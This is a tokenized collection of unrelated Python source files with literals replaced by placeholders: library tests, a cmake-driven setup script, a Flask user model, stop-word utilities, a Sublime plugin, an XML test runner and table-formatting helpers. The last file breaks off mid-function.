<s> from unittest import TestCase , TestSuite , main , makeSuite <EOL> from fakeclient import FakeClient , GranularityFakeClient , TestError <EOL> import os <EOL> from datetime import datetime <EOL> from oaipmh import common , metadata , validation , error <EOL> directory = os . path . dirname ( __file__ ) <EOL> fake42 = os . path . join ( directory , '<STR_LIT>' ) <EOL> fakeclient = FakeClient ( fake42 ) <EOL> fakeclient . getMetadataRegistry ( ) . registerReader ( <EOL> '<STR_LIT>' , metadata . oai_dc_reader ) <EOL> class ResumptionTestCase ( TestCase ) : <EOL> def test_withoutToken ( self ) : <EOL> records = fakeclient . listRecords ( metadataPrefix = '<STR_LIT>' ) <EOL> records = list ( records ) <EOL> self . assertEqual ( len ( records ) , <NUM_LIT> ) <EOL> def test_withToken ( self ) : <EOL> records = fakeclient . listRecords ( resumptionToken = '<STR_LIT>' , <EOL> metadataPrefix = '<STR_LIT>' ) <EOL> records = list ( records ) <EOL> self . assertEqual ( len ( records ) , <NUM_LIT> ) <EOL> def test_suite ( ) : <EOL> return TestSuite ( ( makeSuite ( ResumptionTestCase ) , ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( defaultTest = '<STR_LIT>' ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import sys <EOL> import subprocess <EOL> PKG = "<STR_LIT>" <EOL> version = "<STR_LIT:test>" <EOL> def setup ( ) : <EOL> try : <EOL> from setuptools import setup as setup_ <EOL> except ImportError : <EOL> from distutils . core import setup as setup_ <EOL> scripts = [ ] <EOL> packages = [ PKG , PKG + '<STR_LIT>' ] <EOL> pack_dir = { PKG : PKG , PKG + '<STR_LIT>' : os . path . join ( PKG , '<STR_LIT>' ) } <EOL> extpttn = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> pack_data = { PKG : [ '<STR_LIT>' , '<STR_LIT>' , ] + extpttn , PKG + '<STR_LIT>' : extpttn } <EOL> setup_kwargs = { <EOL> "<STR_LIT:name>" : PKG , <EOL> "<STR_LIT:version>" : version , <EOL> "<STR_LIT:description>" : "<STR_LIT>" . format ( PKG ) , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT:url>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : packages , <EOL> "<STR_LIT>" : pack_dir , <EOL> "<STR_LIT>" : pack_data , <EOL> "<STR_LIT>" : scripts , <EOL> } <EOL> rtn = setup_ ( ** setup_kwargs ) <EOL> def parse_args ( ) : <EOL> distutils = [ ] <EOL> cmake = [ ] <EOL> make = [ ] <EOL> argsets = [ distutils , cmake , make ] <EOL> i = <NUM_LIT:0> <EOL> for arg in sys . argv : <EOL> if arg == '<STR_LIT>' : <EOL> i += <NUM_LIT:1> <EOL> else : <EOL> argsets [ i ] . append ( arg ) <EOL> hdf5opt = [ o . split ( '<STR_LIT:=>' ) [ <NUM_LIT:1> ] for o in distutils if o . startswith ( '<STR_LIT>' ) ] <EOL> if <NUM_LIT:0> < len ( hdf5opt ) : <EOL> os . environ [ '<STR_LIT>' ] = hdf5opt [ <NUM_LIT:0> ] <EOL> distutils = [ o for o in distutils if not o . startswith ( '<STR_LIT>' ) ] <EOL> return distutils , cmake , make <EOL> def main_body ( ) : <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> sys . argv , cmake_args , make_args = parse_args ( ) <EOL> makefile = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( makefile ) : <EOL> cmake_cmd = [ '<STR_LIT>' , '<STR_LIT:..>' ] + cmake_args <EOL> cmake_cmd += [ '<STR_LIT>' + sys . executable , ] <EOL> if os . name == '<STR_LIT>' : <EOL> files_on_path = set ( ) <EOL> for p in os . environ [ '<STR_LIT>' ] . split ( '<STR_LIT:;>' ) [ : : - <NUM_LIT:1> ] : <EOL> if os . path . exists ( p ) : <EOL> files_on_path . update ( os . listdir ( p ) ) <EOL> if '<STR_LIT>' in files_on_path : <EOL> pass <EOL> elif '<STR_LIT>' in files_on_path : <EOL> cmake_cmd += [ '<STR_LIT>' ] <EOL> elif '<STR_LIT>' in files_on_path : <EOL> cmake_cmd += [ '<STR_LIT>' ] <EOL> cmake_cmd = '<STR_LIT:U+0020>' . join ( cmake_cmd ) <EOL> rtn = subprocess . check_call ( cmake_cmd , cwd = '<STR_LIT>' , shell = ( os . name == '<STR_LIT>' ) ) <EOL> rtn = subprocess . check_call ( [ '<STR_LIT>' ] + make_args , cwd = '<STR_LIT>' ) <EOL> cwd = os . getcwd ( ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> setup ( ) <EOL> os . chdir ( cwd ) <EOL> def main ( ) : <EOL> success = False <EOL> try : <EOL> main_body ( ) <EOL> success = True <EOL> finally : <EOL> print ( "<STR_LIT>" . format ( success ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import sys <EOL> import collections <EOL> from . utils import isclassdesc , NotSpecified <EOL> from . types . matching import TypeMatcher <EOL> from . plugins import Plugin <EOL> if sys . version_info [ <NUM_LIT:0> ] >= <NUM_LIT:3> : <EOL> basestring = str <EOL> def modify_desc ( skips , desc ) : <EOL> """<STR_LIT>""" <EOL> for at_name , at_t in desc [ '<STR_LIT>' ] . copy ( ) . items ( ) : <EOL> for tm in skips : <EOL> if tm . flatmatches ( at_t ) : <EOL> del desc [ '<STR_LIT>' ] [ at_name ] <EOL> break <EOL> for m_key , m_ret in desc [ '<STR_LIT>' ] . copy ( ) . items ( ) : <EOL> _deleted = False <EOL> for tm in skips : <EOL> if m_ret and tm . flatmatches ( m_ret [ '<STR_LIT>' ] ) : <EOL> del desc [ '<STR_LIT>' ] [ m_key ] <EOL> _deleted = True <EOL> break <EOL> if _deleted : <EOL> continue <EOL> m_args = m_key [ <NUM_LIT:1> : ] <EOL> for arg in m_args : <EOL> t = arg [ <NUM_LIT:1> ] <EOL> for tm in skips : <EOL> if tm . flatmatches ( t ) : <EOL> del desc [ '<STR_LIT>' ] [ m_key ] <EOL> _deleted = True <EOL> break <EOL> if _deleted : <EOL> break <EOL> class XDressPlugin ( Plugin ) : <EOL> """<STR_LIT>""" <EOL> requires = ( '<STR_LIT>' , ) <EOL> defaultrc = { '<STR_LIT>' : NotSpecified , <EOL> '<STR_LIT>' : NotSpecified , <EOL> '<STR_LIT>' : NotSpecified , <EOL> '<STR_LIT>' : NotSpecified , <EOL> '<STR_LIT>' : NotSpecified } <EOL> rcdocs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def setup ( self , rc ) : <EOL> if rc . skiptypes is NotSpecified : <EOL> return <EOL> if isinstance ( rc . skiptypes , collections . Mapping ) : <EOL> _skippers = { } <EOL> for kls in rc . skiptypes . keys ( ) : <EOL> _skippers [ kls ] = [ TypeMatcher ( t ) for t in rc . skiptypes [ kls ] ] <EOL> rc . skiptypes = _skippers <EOL> elif isinstance ( rc . skiptypes , collections . Sequence ) : <EOL> rc . skiptypes = [ TypeMatcher ( t ) for t in rc . skiptypes ] <EOL> if rc . verbose : <EOL> print ( "<STR_LIT>" . format ( rc . skiptypes ) ) <EOL> def skip_types ( self , rc ) : <EOL> """<STR_LIT>""" <EOL> if rc . skiptypes is NotSpecified : <EOL> return <EOL> print ( "<STR_LIT>" ) <EOL> if isinstance ( rc . skiptypes , collections . Mapping ) : <EOL> skip_classes = rc . skiptypes . keys ( ) <EOL> for mod_key , mod in rc . env . items ( ) : <EOL> for kls_key , desc in mod . items ( ) : <EOL> if isclassdesc ( desc ) : <EOL> if desc [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] in skip_classes : <EOL> skips = rc . skips [ desc [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] ] <EOL> modify_desc ( skips , desc ) <EOL> elif isinstance ( rc . skiptypes , collections . Sequence ) : <EOL> for mod_key , mod in rc . env . items ( ) : <EOL> for kls_key , desc in mod . items ( ) : <EOL> if isclassdesc ( desc ) : <EOL> skips = rc . skiptypes <EOL> modify_desc ( skips , desc ) <EOL> def skip_methods ( self , rc ) : <EOL> """<STR_LIT>""" <EOL> if rc . skipmethods is NotSpecified : <EOL> return <EOL> print ( "<STR_LIT>" ) <EOL> skip_classes = rc . skipmethods . keys ( ) <EOL> for m_key , mod in rc . env . items ( ) : <EOL> for k_key , kls_desc in mod . items ( ) : <EOL> if isclassdesc ( kls_desc ) : <EOL> if kls_desc [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] in skip_classes : <EOL> skippers = rc . skipmethods [ k_key ] <EOL> m_nms = rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] . keys ( ) <EOL> for m in skippers : <EOL> try : <EOL> f = lambda x : x [ <NUM_LIT:0> ] . startswith ( m ) if isinstance ( x [ <NUM_LIT:0> ] , basestring ) else x [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . startswith ( m ) <EOL> del_key = filter ( f , m_nms ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> msg = '<STR_LIT>' <EOL> msg += '<STR_LIT>' <EOL> print ( msg . format ( m , k_key ) ) <EOL> continue <EOL> del rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] [ del_key ] <EOL> def skip_attrs ( self , rc ) : <EOL> """<STR_LIT>""" <EOL> if rc . skipattrs is NotSpecified : <EOL> return <EOL> print ( "<STR_LIT>" ) <EOL> skip_classes = rc . skipattrs . keys ( ) <EOL> for m_key , mod in rc . env . items ( ) : <EOL> for k_key , kls_desc in mod . items ( ) : <EOL> if isclassdesc ( kls_desc ) : <EOL> if kls_desc [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] in skip_classes : <EOL> skippers = rc . skipattrs [ k_key ] <EOL> a_nms = rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] <EOL> for m in skippers : <EOL> if m in a_nms : <EOL> del rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] [ m ] <EOL> else : <EOL> msg = '<STR_LIT>' <EOL> msg += '<STR_LIT>' <EOL> print ( msg . format ( m , k_key ) ) <EOL> def include_methods ( self , rc ) : <EOL> """<STR_LIT>""" <EOL> if rc . includemethods is NotSpecified : <EOL> return <EOL> print ( "<STR_LIT>" ) <EOL> inc_classes = rc . includemethods . keys ( ) <EOL> for m_key , mod in rc . env . items ( ) : <EOL> for k_key , kls_desc in mod . items ( ) : <EOL> if isclassdesc ( kls_desc ) : <EOL> if kls_desc [ '<STR_LIT:name>' ] [ '<STR_LIT>' ] in inc_classes : <EOL> keeps = set ( rc . includemethods [ k_key ] ) <EOL> m_nms = rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] . keys ( ) <EOL> m_keep = filter ( lambda x : x [ <NUM_LIT:0> ] in keeps , m_nms ) <EOL> new_meths = { } <EOL> for mm in m_keep : <EOL> new_meths [ mm ] = rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] [ mm ] <EOL> rc . env [ m_key ] [ k_key ] [ '<STR_LIT>' ] = new_meths <EOL> def skip_auto ( self , rc ) : <EOL> """<STR_LIT>""" <EOL> if rc . skipauto is NotSpecified : <EOL> return <EOL> ts = rc . ts <EOL> for src_name , cls_dict in rc . env . items ( ) : <EOL> for cls_name , cls_desc in cls_dict . items ( ) : <EOL> if isclassdesc ( cls_desc ) : <EOL> attr_blacklist = [ ] <EOL> for a_name , a_type in cls_desc [ '<STR_LIT>' ] . items ( ) : <EOL> try : <EOL> ts . canon ( a_type ) <EOL> except TypeError : <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> a_name , cls_name , a_type ) ) <EOL> attr_blacklist . append ( a_name ) <EOL> for a in attr_blacklist : <EOL> del cls_desc [ '<STR_LIT>' ] [ a ] <EOL> method_blacklist = [ ] <EOL> for m_sig , m_attr in cls_desc [ '<STR_LIT>' ] . items ( ) : <EOL> m_name = m_sig [ <NUM_LIT:0> ] <EOL> try : <EOL> if m_attr is not None : <EOL> r_type = m_attr [ '<STR_LIT>' ] <EOL> arg_type = r_type <EOL> ts . canon ( r_type ) <EOL> pass <EOL> for _ , arg_type in m_sig [ <NUM_LIT:1> : ] : <EOL> ts . canon ( arg_type ) <EOL> except TypeError : <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> m_name , cls_name , arg_type ) ) <EOL> method_blacklist . append ( m_sig ) <EOL> for m in method_blacklist : <EOL> del cls_desc [ '<STR_LIT>' ] [ m ] <EOL> def execute ( self , rc ) : <EOL> self . skip_types ( rc ) <EOL> self . skip_methods ( rc ) <EOL> self . skip_attrs ( rc ) <EOL> self . skip_auto ( rc ) <EOL> self . include_methods ( rc ) </s>
<s> from hashlib import md5 <EOL> from . . extensions import db <EOL> from flask . ext . login import UserMixin <EOL> class User ( db . Model , UserMixin ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = db . Column ( db . Integer , primary_key = True ) <EOL> username = db . Column ( db . String ( <NUM_LIT:200> ) , unique = True ) <EOL> password = db . Column ( db . String ( <NUM_LIT:200> ) , default = '<STR_LIT>' ) <EOL> name = db . Column ( db . String ( <NUM_LIT:100> ) ) <EOL> email = db . Column ( db . String ( <NUM_LIT:200> ) ) <EOL> active = db . Column ( db . Boolean , default = True ) <EOL> ui_lang = db . Column ( db . String ( <NUM_LIT:2> ) , default = '<STR_LIT>' ) <EOL> url = db . Column ( db . String ( <NUM_LIT:200> ) ) <EOL> def gavatar ( self , size = <NUM_LIT> ) : <EOL> if self . email : <EOL> return '<STR_LIT>' . format ( <EOL> hashd = md5 ( self . email ) . hexdigest ( ) , size = str ( size ) ) <EOL> else : <EOL> return None <EOL> def is_active ( self ) : <EOL> return self . active <EOL> def get_access_token ( self , provider , param_name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> s = self . social_auth . filter_by ( provider = provider ) . one ( ) <EOL> return s . extra_data . get ( param_name , None ) </s>
<s> from __future__ import print_function <EOL> from builtins import object <EOL> import re <EOL> import difflib <EOL> COLUMN_NAMES = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT:name>' , <EOL> '<STR_LIT:type>' : '<STR_LIT:type>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> class Pin ( object ) : <EOL> pass <EOL> DEFAULT_PIN = Pin ( ) <EOL> DEFAULT_PIN . num = None <EOL> DEFAULT_PIN . name = '<STR_LIT>' <EOL> DEFAULT_PIN . type = '<STR_LIT>' <EOL> DEFAULT_PIN . style = '<STR_LIT>' <EOL> DEFAULT_PIN . unit = <NUM_LIT:1> <EOL> DEFAULT_PIN . side = '<STR_LIT:left>' <EOL> def num_row_elements ( row ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> rowset = set ( row ) <EOL> rowset . discard ( '<STR_LIT>' ) <EOL> return len ( rowset ) <EOL> except TypeError : <EOL> return <NUM_LIT:0> <EOL> def get_nonblank_row ( csv_reader ) : <EOL> '''<STR_LIT>''' <EOL> for row in csv_reader : <EOL> if num_row_elements ( row ) > <NUM_LIT:0> : <EOL> return row <EOL> return None <EOL> def get_part_num ( csv_reader ) : <EOL> '''<STR_LIT>''' <EOL> part_num = get_nonblank_row ( csv_reader ) <EOL> try : <EOL> part_num = set ( part_num ) <EOL> part_num . discard ( '<STR_LIT>' ) <EOL> return part_num . pop ( ) <EOL> except TypeError : <EOL> return None <EOL> def find_closest_match ( name , name_dict , fuzzy_match , threshold = <NUM_LIT:0.0> ) : <EOL> '''<STR_LIT>''' <EOL> scrubber = re . compile ( '<STR_LIT>' ) <EOL> name = scrubber . sub ( '<STR_LIT>' , name ) . lower ( ) <EOL> if fuzzy_match == False : <EOL> return name_dict [ name ] <EOL> match = difflib . get_close_matches ( name , list ( name_dict . keys ( ) ) , <NUM_LIT:1> , threshold ) [ <NUM_LIT:0> ] <EOL> return name_dict [ match ] <EOL> def clean_headers ( headers ) : <EOL> '''<STR_LIT>''' <EOL> return [ find_closest_match ( h , COLUMN_NAMES , True ) for h in headers ] <EOL> def issue ( msg , level = '<STR_LIT>' ) : <EOL> if level == '<STR_LIT>' : <EOL> print ( '<STR_LIT>' . format ( msg ) ) <EOL> elif level == '<STR_LIT:error>' : <EOL> print ( '<STR_LIT>' . format ( msg ) ) <EOL> raise Exception ( '<STR_LIT>' ) <EOL> else : <EOL> print ( msg ) <EOL> def fix_pin_data ( pin_data , part_num ) : <EOL> '''<STR_LIT>''' <EOL> fixed_pin_data = pin_data . strip ( ) <EOL> if re . search ( '<STR_LIT>' , fixed_pin_data ) is not None : <EOL> fixed_pin_data = re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , fixed_pin_data ) <EOL> issue ( "<STR_LIT>" . format ( ** locals ( ) ) ) <EOL> return fixed_pin_data </s>
<s> import os <EOL> import unittest2 as unittest <EOL> from graphviz . files import File , Source <EOL> class TestBase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . file = File ( ) <EOL> def test_format ( self ) : <EOL> with self . assertRaisesRegexp ( ValueError , '<STR_LIT>' ) : <EOL> self . file . format = '<STR_LIT>' <EOL> def test_engine ( self ) : <EOL> with self . assertRaisesRegexp ( ValueError , '<STR_LIT>' ) : <EOL> self . file . engine = '<STR_LIT>' <EOL> def test_encoding ( self ) : <EOL> with self . assertRaisesRegexp ( LookupError , '<STR_LIT>' ) : <EOL> self . file . encoding = '<STR_LIT>' <EOL> class TestFile ( unittest . TestCase ) : <EOL> def test_init ( self ) : <EOL> f = File ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( f . filename , '<STR_LIT:name>' ) <EOL> self . assertEqual ( f . format , '<STR_LIT>' ) <EOL> self . assertEqual ( f . engine , '<STR_LIT>' ) <EOL> self . assertEqual ( f . encoding , '<STR_LIT>' ) <EOL> class TestNoent ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . _oldpath = os . environ . get ( '<STR_LIT>' ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . file = File ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . file . source = '<STR_LIT>' <EOL> def tearDown ( self ) : <EOL> if self . _oldpath is None : <EOL> del os . environ [ '<STR_LIT>' ] <EOL> else : <EOL> os . environ [ '<STR_LIT>' ] = self . _oldpath <EOL> def test_pipe ( self ) : <EOL> with self . assertRaisesRegexp ( RuntimeError , '<STR_LIT>' ) : <EOL> self . file . pipe ( ) <EOL> def test_render ( self ) : <EOL> with self . assertRaisesRegexp ( RuntimeError , '<STR_LIT>' ) : <EOL> self . file . render ( ) <EOL> class TestSource ( unittest . TestCase ) : <EOL> def test_init ( self ) : <EOL> source = '<STR_LIT>' <EOL> s = Source ( source ) <EOL> self . assertEqual ( s . source , source ) </s>
<s> __version__ = "<STR_LIT>" <EOL> __author__ = "<STR_LIT>" <EOL> __date__ = "<STR_LIT>" <EOL> """<STR_LIT>""" <EOL> from cookbook import HTML2PDF <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> xhtml = open ( '<STR_LIT>' ) <EOL> HTML2PDF ( xhtml . read ( ) , "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import string <EOL> from goose . utils import FileHelper <EOL> from goose . utils . encoding import smart_unicode <EOL> from goose . utils . encoding import smart_str <EOL> from goose . utils . encoding import DjangoUnicodeDecodeError <EOL> TABSSPACE = re . compile ( r'<STR_LIT>' ) <EOL> def innerTrim ( value ) : <EOL> if isinstance ( value , ( unicode , str ) ) : <EOL> value = re . sub ( TABSSPACE , '<STR_LIT:U+0020>' , value ) <EOL> value = '<STR_LIT>' . join ( value . splitlines ( ) ) <EOL> return value . strip ( ) <EOL> return '<STR_LIT>' <EOL> def encodeValue ( value ) : <EOL> string_org = value <EOL> try : <EOL> value = smart_unicode ( value ) <EOL> except ( UnicodeEncodeError , DjangoUnicodeDecodeError ) : <EOL> value = smart_str ( value ) <EOL> except : <EOL> value = string_org <EOL> return value <EOL> class WordStats ( object ) : <EOL> def __init__ ( self ) : <EOL> self . stop_word_count = <NUM_LIT:0> <EOL> self . word_count = <NUM_LIT:0> <EOL> self . stop_words = [ ] <EOL> def get_stop_words ( self ) : <EOL> return self . stop_words <EOL> def set_stop_words ( self , words ) : <EOL> self . stop_words = words <EOL> def get_stopword_count ( self ) : <EOL> return self . stop_word_count <EOL> def set_stopword_count ( self , wordcount ) : <EOL> self . stop_word_count = wordcount <EOL> def get_word_count ( self ) : <EOL> return self . word_count <EOL> def set_word_count ( self , cnt ) : <EOL> self . word_count = cnt <EOL> class StopWords ( object ) : <EOL> PUNCTUATION = re . compile ( "<STR_LIT>" ) <EOL> TRANS_TABLE = string . maketrans ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> _cached_stop_words = { } <EOL> def __init__ ( self , language = '<STR_LIT>' ) : <EOL> if not language in self . _cached_stop_words : <EOL> path = os . path . join ( '<STR_LIT:text>' , '<STR_LIT>' % language ) <EOL> self . _cached_stop_words [ language ] = set ( FileHelper . loadResourceFile ( path ) . splitlines ( ) ) <EOL> self . STOP_WORDS = self . _cached_stop_words [ language ] <EOL> def remove_punctuation ( self , content ) : <EOL> if isinstance ( content , unicode ) : <EOL> content = content . encode ( '<STR_LIT:utf-8>' ) <EOL> return content . translate ( self . TRANS_TABLE , string . punctuation ) . decode ( '<STR_LIT:utf-8>' ) <EOL> def candiate_words ( self , stripped_input ) : <EOL> return stripped_input . split ( '<STR_LIT:U+0020>' ) <EOL> def get_stopword_count ( self , content ) : <EOL> if not content : <EOL> return WordStats ( ) <EOL> ws = WordStats ( ) <EOL> stripped_input = self . remove_punctuation ( content ) <EOL> candiate_words = self . candiate_words ( stripped_input ) <EOL> overlapping_stopwords = [ ] <EOL> c = <NUM_LIT:0> <EOL> for w in candiate_words : <EOL> c += <NUM_LIT:1> <EOL> if w . lower ( ) in self . STOP_WORDS : <EOL> overlapping_stopwords . append ( w . lower ( ) ) <EOL> ws . set_word_count ( c ) <EOL> ws . set_stopword_count ( len ( overlapping_stopwords ) ) <EOL> ws . set_stop_words ( overlapping_stopwords ) <EOL> return ws <EOL> class StopWordsChinese ( StopWords ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , language = '<STR_LIT>' ) : <EOL> super ( StopWordsChinese , self ) . __init__ ( language = '<STR_LIT>' ) <EOL> def candiate_words ( self , stripped_input ) : <EOL> import jieba <EOL> return jieba . cut ( stripped_input , cut_all = True ) <EOL> class StopWordsArabic ( StopWords ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , language = '<STR_LIT>' ) : <EOL> super ( StopWordsArabic , self ) . __init__ ( language = '<STR_LIT>' ) <EOL> def remove_punctuation ( self , content ) : <EOL> return content <EOL> def candiate_words ( self , stripped_input ) : <EOL> import nltk <EOL> s = nltk . stem . isri . ISRIStemmer ( ) <EOL> words = [ ] <EOL> for word in nltk . tokenize . wordpunct_tokenize ( stripped_input ) : <EOL> words . append ( s . stem ( word ) ) <EOL> return words </s>
<s> import sublime , sublime_plugin <EOL> from . gist . lib import util <EOL> class HaoGistEvent ( sublime_plugin . EventListener ) : <EOL> def on_post_save_async ( self , view ) : <EOL> settings = util . get_settings ( ) ; <EOL> if settings [ "<STR_LIT>" ] not in view . file_name ( ) : return <EOL> if settings . get ( '<STR_LIT>' ) : <EOL> view . run_command ( '<STR_LIT>' ) </s>
<s> import sys <EOL> import time <EOL> from . unittest import TextTestRunner <EOL> from . result import _XMLTestResult <EOL> UTF8 = '<STR_LIT>' <EOL> class XMLTestRunner ( TextTestRunner ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , output = '<STR_LIT:.>' , outsuffix = None , stream = sys . stderr , <EOL> descriptions = True , verbosity = <NUM_LIT:1> , elapsed_times = True , <EOL> failfast = False , buffer = False , encoding = UTF8 , <EOL> resultclass = None ) : <EOL> TextTestRunner . __init__ ( self , stream , descriptions , verbosity , <EOL> failfast = failfast , buffer = buffer ) <EOL> self . verbosity = verbosity <EOL> self . output = output <EOL> self . encoding = encoding <EOL> if outsuffix is None : <EOL> outsuffix = time . strftime ( "<STR_LIT>" ) <EOL> self . outsuffix = outsuffix <EOL> self . elapsed_times = elapsed_times <EOL> if resultclass is None : <EOL> self . resultclass = _XMLTestResult <EOL> else : <EOL> self . resultclass = resultclass <EOL> def _make_result ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . resultclass ( <EOL> self . stream , self . descriptions , self . verbosity , self . elapsed_times <EOL> ) <EOL> def run ( self , test ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> result = self . _make_result ( ) <EOL> result . failfast = self . failfast <EOL> if hasattr ( test , '<STR_LIT>' ) : <EOL> result . properties = test . properties <EOL> self . stream . writeln ( ) <EOL> self . stream . writeln ( '<STR_LIT>' ) <EOL> self . stream . writeln ( result . separator2 ) <EOL> start_time = time . time ( ) <EOL> test ( result ) <EOL> stop_time = time . time ( ) <EOL> time_taken = stop_time - start_time <EOL> result . printErrors ( ) <EOL> self . stream . writeln ( result . separator2 ) <EOL> run = result . testsRun <EOL> self . stream . writeln ( "<STR_LIT>" % ( <EOL> run , run != <NUM_LIT:1> and "<STR_LIT:s>" or "<STR_LIT>" , time_taken ) <EOL> ) <EOL> self . stream . writeln ( ) <EOL> expectedFails = len ( result . expectedFailures ) <EOL> unexpectedSuccesses = len ( result . unexpectedSuccesses ) <EOL> skipped = len ( result . skipped ) <EOL> infos = [ ] <EOL> if not result . wasSuccessful ( ) : <EOL> self . stream . write ( "<STR_LIT>" ) <EOL> failed , errored = map ( len , ( result . failures , result . errors ) ) <EOL> if failed : <EOL> infos . append ( "<STR_LIT>" . format ( failed ) ) <EOL> if errored : <EOL> infos . append ( "<STR_LIT>" . format ( errored ) ) <EOL> else : <EOL> self . stream . write ( "<STR_LIT:OK>" ) <EOL> if skipped : <EOL> infos . append ( "<STR_LIT>" . format ( skipped ) ) <EOL> if expectedFails : <EOL> infos . append ( "<STR_LIT>" . format ( expectedFails ) ) <EOL> if unexpectedSuccesses : <EOL> infos . append ( "<STR_LIT>" . format ( <EOL> unexpectedSuccesses ) ) <EOL> if infos : <EOL> self . stream . writeln ( "<STR_LIT>" . format ( "<STR_LIT:U+002CU+0020>" . join ( infos ) ) ) <EOL> else : <EOL> self . stream . write ( "<STR_LIT:\n>" ) <EOL> self . stream . writeln ( ) <EOL> self . stream . writeln ( '<STR_LIT>' ) <EOL> result . generate_reports ( self ) <EOL> finally : <EOL> pass <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import re <EOL> from humanfriendly . compat import coerce_string <EOL> from humanfriendly . terminal import ( <EOL> ansi_strip , <EOL> ansi_width , <EOL> ansi_wrap , <EOL> terminal_supports_colors , <EOL> find_terminal_size , <EOL> HIGHLIGHT_COLOR , <EOL> ) <EOL> __all__ = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> NUMERIC_DATA_PATTERN = re . compile ( r'<STR_LIT>' ) <EOL> def format_smart_table ( data , column_names ) : <EOL> """<STR_LIT>""" <EOL> data = [ normalize_columns ( r ) for r in data ] <EOL> column_names = normalize_columns ( column_names ) <EOL> if not any ( any ( '<STR_LIT:\n>' in c for c in r ) for r in data ) : <EOL> pretty_table = format_pretty_table ( data , column_names ) <EOL> table_width = max ( map ( ansi_width , pretty_table . splitlines ( ) ) ) <EOL> num_rows , num_columns = find_terminal_size ( ) <EOL> if table_width <= num_columns : <EOL> return pretty_table <EOL> return format_robust_table ( data , column_names ) <EOL> def format_pretty_table ( data , column_names = None , horizontal_bar = '<STR_LIT:->' , vertical_bar = '<STR_LIT:|>' ) : <EOL> """<STR_LIT>""" <EOL> data = [ normalize_columns ( r ) for r in data ] <EOL> if column_names is not None : <EOL> column_names = normalize_columns ( column_names ) <EOL> if column_names : <EOL> if terminal_supports_colors ( ) : <EOL> column_names = [ highlight_column_name ( n ) for n in column_names ] <EOL> data . insert ( <NUM_LIT:0> , column_names ) <EOL> widths = collections . defaultdict ( int ) <EOL> numeric_data = collections . defaultdict ( list ) <EOL> for row_index , row in enumerate ( data ) : <EOL> for column_index , column in enumerate ( row ) : <EOL> widths [ column_index ] = max ( widths [ column_index ] , ansi_width ( column ) ) <EOL> if not ( column_names and row_index == <NUM_LIT:0> ) : <EOL> numeric_data [ column_index ] . append ( bool ( NUMERIC_DATA_PATTERN . match ( ansi_strip ( column ) ) ) ) <EOL> line_delimiter = horizontal_bar * ( sum ( widths . values ( ) ) + len ( widths ) * <NUM_LIT:3> + <NUM_LIT:1> ) <EOL> lines = [ line_delimiter ] <EOL> for row_index , row in enumerate ( data ) : <EOL> line = [ vertical_bar ] <EOL> for column_index , column in enumerate ( row ) : <EOL> padding = '<STR_LIT:U+0020>' * ( widths [ column_index ] - ansi_width ( column ) ) <EOL> if all ( numeric_data [ column_index ] ) : <EOL> line . append ( '<STR_LIT:U+0020>' + padding + column + '<STR_LIT:U+0020>' ) <EOL> else : <EOL> line . append ( '<STR_LIT:U+0020>' + column + padding + 